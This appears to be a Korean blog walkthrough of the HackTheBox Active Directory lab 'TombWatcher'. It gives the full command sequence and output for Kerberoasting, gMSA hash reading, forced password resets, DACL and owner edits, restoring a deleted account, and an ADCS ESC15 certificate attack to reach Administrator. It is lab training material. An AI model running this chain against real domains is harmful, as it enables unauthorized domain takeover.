d0razi's brain

[Machine] TombWatcher

9 min read

Box Info

NameDifficulty
TombWatcherMedium

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

user flag

smb에선 아무런 취약점을 찾지 못하여 bloodhound로 넘어갔습니다.

bloodhound-quickwin을 확인해보니 SAM 유저가 JOHN에 대해 WriteOwner 권한인 것과 JOHN 유저가 REMOTE MANAGEMENT USERS 그룹에 속해 있는걸 확인했습니다.

그래서 henry 유저를 시작 노드로 찍고 JOHN 유저를 끝 노드로 지정했더니 아래와 같이 경로가 출력되었습니다.

1.1 writespn

블러드하운드에 있는 명령어 참고하여 공격 진행했습니다.

targetedKerberoast.py Kerberoast 기법을 자동화한 도구로, Active Directory 환경에서 SPN이 등록된 계정들에 Kerberos 서비스 티켓(TGS)을 요청해 성공한 계정의 암호화 해시를 추출하는 스크립트

userpassword
Alfredbasketball

1.2 Add Self

INFRASTRUCTURE 그룹에 Alfred 유저 추가

[Oct 20, 2025 - 21:00:39 (KST)] exegol-htb
TombWatcher # bloodyAD --host 'tombwatcher.htb' -d 'dc01.tombwatcher.htb' -u 'alfred' -p 'basketball' add groupMember 'INFRASTRUCTURE' 'alfred'
[+] alfred added to INFRASTRUCTURE

1.3 ReadGMSAPassword

[Oct 20, 2025 - 21:16:30 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "alfred" -p "basketball" get object 'ANSIBLE_DEV$' --attr msDS-ManagedPassword
 
distinguishedName: CN=ansible_dev,CN=Managed Service Accounts,DC=tombwatcher,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:bf8b11e301f7ba3fdc616e5d4fa01c30
msDS-ManagedPassword.B64ENCODED: hTHfon3m4u5bkUTSlOKiTcVGqaIiYqe4SrrDZd8uUEmyGMin8X1qKy6L5ZHVlsvRp17h6l5hC0OqLxYV/WGcmmGom+hqBklNY+MSgPO2r8SUnGniBbV3VR2C6pak3TJxRHd+4yb8iNDsLLgEG/goJ8yVoaaYpQppZWEOtE9EvQLV0nYjWoReut1xHZ1QP/kmHL6hOGrASDo2FIgXRQmEzjyatED/Zdz7s3mfB3OuOWxQUiyd4tic2RFKHEjurhJXN8iuVh0jPJzyWqEiF+5+ZYDckA52ICoIN9JhyAxH3R6Ftqjok3Xc524zjHBiE3Fb7ZMBtNkjobLCxW3976E1yw==

1.4 ForceChangePassword

[Oct 21, 2025 - 16:52:04 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "ansible_dev$" -p :bf8b11e301f7ba3fdc616e5d4fa01c30 set password "sam" 'password123'
[+] Password changed successfully!

1.5 WriteOwner

  • owneredit.pyjohn 계정 소유권 sam으로 변경
  • dacledit.pyFullControl 권한 획득
[Oct 21, 2025 - 17:19:54 (KST)] exegol-htb
TombWatcher # owneredit.py -action write -target 'john' -new-owner 'sam' tombwatcher.htb/sam:password123
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
 
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-1105
[*] - sAMAccountName: sam
[*] - distinguishedName: CN=sam,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
 
[Oct 21, 2025 - 17:19:16 (KST)] exegol-htb
TombWatcher # dacledit.py -action write -rights FullControl -principal sam -target john tombwatcher.htb/sam:password123
Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies
 
[*] DACL backed up to dacledit-20251021-171935.bak
[*] DACL modified successfully!
 
[Oct 21, 2025 - 17:19:45 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "sam" -p 'password123' set password "john" 'password123'
[+] Password changed successfully!

get flag

root flag

[Oct 21, 2025 - 15:03:47 (KST)] exegol-htb
lpe # certipy find -u [email protected] -p 'password123' -dc-ip 10.10.11.72
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20251021150415_Certipy.txt'
[*] Wrote text output to '20251021150415_Certipy.txt'
[*] Saving JSON output to '20251021150415_Certipy.json'
[*] Wrote JSON output to '20251021150415_Certipy.json'

john 계정으로 winrm 접속했을때 공격 벡터를 못 찾아서 certipyjohn 계정에 대한 취약점을 스캔하던 중 특정 SID를 찾았습니다.

찾아보니 해당 출력은 ‘권한을 가진 것으로 등록된 SID가 있지만, 현재 Active Directory에서 그 SID에 해당하는 사용자나 그룹을 찾을 수 없다’ 는 의미였습니다.

접근 가능한 계정 중 가장 높은 권한인 GenericAll 권한인 john 계정으로 한번 restore를 시도했는데 성공했습니다.

restore SID

[Oct 21, 2025 - 16:19:35 (KST)] exegol-htb
lpe # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' set restore "S-1-5-21-1392491010-1358638721-2126982587-1111"
[+] S-1-5-21-1392491010-1358638721-2126982587-1111 has been restored successfully under CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb

성공적으로 복구 후 cert_admin 계정의 비밀번호를 john 계정으로 변경을 시도했는데 계정이 비활성화 상태여서 활성화 후 비밀번호 재설정을 진행했습니다.

remove ACCOUNTDISABLE flags

TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' remove uac 'cert_admin' -f ACCOUNTDISABLE
[+] ['ACCOUNTDISABLE'] property flags removed from cert_admin's userAccountControl

set cert_admin password

[Oct 22, 2025 - 20:43:43 (KST)] exegol-htb
TombWatcher # bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u "john" -p 'password123' set password "cert_admin" 'password123'
[+] Password changed successfully!

ESC15

[Oct 22, 2025 - 20:54:06 (KST)] exegol-htb
TombWatcher # certipy find -vulnerable -u [email protected] -p 'password123' -dc-ip 10.10.11.72
Certipy v5.0.3 - by Oliver Lyak (ly4k)
 
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[!] Failed to get CA configuration for 'tombwatcher-CA-1' via RRP: [Errno 22] Invalid argument
[!] Use -debug to print a stacktrace
[!] Could not retrieve configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20251022205429_Certipy.txt'
[*] Wrote text output to '20251022205429_Certipy.txt'
[*] Saving JSON output to '20251022205429_Certipy.json'
[*] Wrote JSON output to '20251022205429_Certipy.json'
[Oct 22, 2025 - 20:54:30 (KST)] exegol-htb
TombWatcher # cat 20251022205429_Certipy.txt
Certificate Authorities
  0
    CA Name                             : tombwatcher-CA-1
    DNS Name                            : DC01.tombwatcher.htb
    Certificate Subject                 : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
    Certificate Serial Number           : 3428A7FC52C310B2460F8440AA8327AC
    Certificate Validity Start          : 2024-11-16 00:47:48+00:00
    Certificate Validity End            : 2123-11-16 00:57:48+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
    Active Policy                       : Unknown
    Disabled Extensions                 : Unknown
Certificate Templates
  0
    Template Name                       : WebServer
    Display Name                        : Web Server
    Certificate Authorities             : tombwatcher-CA-1
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 1
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-16T00:57:49+00:00
    Template Last Modified              : 2024-11-16T17:07:26+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
      Object Control Permissions
        Owner                           : TOMBWATCHER.HTB\Enterprise Admins
        Full Control Principals         : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Owner Principals          : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Dacl Principals           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
        Write Property Enroll           : TOMBWATCHER.HTB\Domain Admins
                                          TOMBWATCHER.HTB\Enterprise Admins
                                          TOMBWATCHER.HTB\cert_admin
    [+] User Enrollable Principals      : TOMBWATCHER.HTB\cert_admin
    [!] Vulnerabilities
      ESC15                             : Enrollee supplies subject and schema version is 1.
    [*] Remarks
      ESC15                             : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.

WINRM 접속이 안돼서 certipy로 취약점 스캔을 진행했는데 ESC15 취약점을 발견했습니다.

ESC15 Vulnerability 오래된(Schema v1) 인증서 템플릿의 논리적 결함을 이용하는 공격입니다. 공격자는 인증서 요청 시, **Application Policies**라는 특정 필드에 ‘클라이언트 인증’ 같은 강력한 EKU(용도)를 주입할 수 있습니다. CA는 이 주입된 EKU를 검증 없이 승인해 인증서를 발급하고, 공격자는 이 인증서로 도메인 관리자 권한을 탈취합니다.

https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc15-arbitrary-application-policy-injection-in-v1-templates-cve-2024-49019-ekuwu

위 사이트를 참고하여 공격을 진행했습니다.

Scenario A

certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -upn '[email protected]' -sid 'S-1-5-21-1392491010-1358638721-2126982587-1111' \
    -application-policies 'Client Authentication'

certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell

첫번째 공격을 진행하다가 사진과 같은 에러를 만났습니다.

결국 해결방법을 못 찾아서 Scenario B 로 공격 방향을 변경했습니다.

Scenario B

certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'WebServer' \
    -application-policies 'Certificate Request Agent'

certipy req \
    -u 'cert_admin' -p 'password123' \
    -dc-ip '10.10.11.72' -target 'dc01.tombwatcher.htb' \
    -ca 'tombwatcher-CA-1' -template 'User' \
    -pfx 'cert_admin.pfx' -on-behalf-of 'tombwatcher\Administrator'

certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72'

그래프 뷰